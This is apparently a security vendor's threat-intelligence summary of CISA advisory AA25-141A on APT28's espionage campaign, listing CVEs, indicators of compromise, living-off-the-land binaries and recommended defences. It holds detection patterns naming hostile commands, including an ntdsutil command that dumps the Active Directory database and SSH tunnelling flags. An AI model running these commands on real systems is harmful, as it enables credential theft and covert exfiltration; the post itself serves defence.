On May 21, 2025, CISA and international cybersecurity authorities issued CSA AA25-141A, attributing a sophisticated espionage campaign to GRU Unit 26165 (APT28/Fancy Bear). These operations have targeted logistics and IT support organizations involved in foreign aid to Ukraine.
Zeek Threat Intelligence Feed - Download
Summary of Threat Campaign
APT28 uses diverse tactics to infiltrate and persist in networks, combining spearphishing, zero-day exploitation, credential attacks, and post-exploitation frameworks to exfiltrate sensitive operational data.
Common Techniques Used:
Initial Access
- Credential stuffing and brute-force attacks via Tor and commercial VPNs
- Spearphishing with links to spoofed login pages
- Exploitation of CVEs, including:
- CVE-2023-23397 (Outlook NTLM hash leak)
- CVE-2023-38831 (WinRAR exploit)
- Roundcube CVEs: 2020-12641, 2020-35730, 2021-44026
Lateral Movement & Persistence
- Deployment of OpenSSH for command/control
- Use of native tools like
Impacket,PsExec,Certipy,ADExplorer - Lateral RDP access and NTDS.dit extraction
- Scheduled task creation with
schtasks
Data Collection & Exfiltration
- Abuse of mailbox permissions for persistent email exfiltration
- Deletion of logs with
wevtutil - Exfiltration using encrypted SSH tunnels
Indicators of Compromise (IOCs)
These indicators may no longer be under actor control or could involve shared infrastructure. Combine with behavioral heuristics for meaningful detection.
Known Exploited Email Accounts
- md-shoeb@alfathdoor[.]com[.]sa
- jayam@wizzsolutions[.]com
- accounts@regencyservice[.]in
- m.salim@tsc-me[.]com
- vikram.anand@4ginfosource[.]com
- mdelafuente@ukwwfze[.]com
- sarah@cosmicgold469[.]co[.]za
- franch1.lanka@bplanka[.]com
- commerical@vanadrink[.]com
- maint@goldenloaduae[.]com
- karina@bhpcapital[.]com
- tv@coastalareabank[.]com
- ashoke.kumar@hbclife[.]in
IP Addresses Used for Brute Force or Infrastructure
- 213.32.252.221, 124.168.91.178, 194.126.178.8, 159.196.128.120
Brute Forcing IPs (June - August 2024)
- June: 192.162.174.94, 207.244.71.84, 31.135.199.145...
- July: 79.184.25.198, 91.149.253.204, 103.97.203.29...
- August: 91.149.254.75, 91.149.255.122, 91.149.255.195...
Common Webmail Domains:
- portugalmail[.]pt
- mail-online[.]dk
- email[.]cz
- seznam[.]cz
Known Malicious Archive Filenames
calc.war.zipnews_week_6.zipRoadmap.zipSEDE-PV-2023-10-09-1_EN.zipZeyilname.zip
Malicious Scripts & Living-off-the-Land (LOTL) Tactics
APT28 actors use legitimate tools in unauthorized ways. Organizations should monitor:
LOTL Binaries
ntdsutil,wevtutil,vssadmin,ADExplorer,schtasks,OpenSSHwhoami,tasklist,hostname,arp,systeminfo,net,wmiccacls,icacls,ssh,reg
Malicious Scripts and Tools
Certipy– AD Certificate Services enumeration/abuseGet-GPPPassword.py– Harvest insecure Group Policy credsldap-dump.py– AD user enumerationHikvisionbackdoor detection string:YWRtaW46MTEK
Suspicious Command Patterns
edge.exe "-headless-new -disable-gpu"ntdsutil.exe "activate instance ntds" ifm "create full C:\\temp\\[a-z]{3}" quit quitssh -Nfschtasks /create /xml
Heuristics and behavioral analytics should accompany rule-based detection to limit false positives from benign admin actions.
Recommended Actions
- Patch all systems vulnerable to CVEs mentioned
- Block and monitor IPs/IP ranges after vetting
- Hunt for suspicious uses of LOTL binaries
- Monitor archive extraction from email and webmail providers above
- Implement alerting on suspicious command line behavior
- Audit mailbox permissions for privilege abuse
- Segment and monitor access to ICS/SCADA interfaces
References
- CISA Advisory AA25-141A
- MITRE ATT&CK: APT28
- Living Off the Land Guidance (CISA/NSA)
- Certipy GitHub
- Outlook CVE-2023-23397
- WinRAR CVE-2023-38831
- Roundcube CVEs
Critical Path Security continuously tracks advanced persistent threats and works with clients to build layered detection models that account for actor TTPs and subtle network deviations.
Reach out to our team for proactive assessments and defense-in-depth strategy engagements.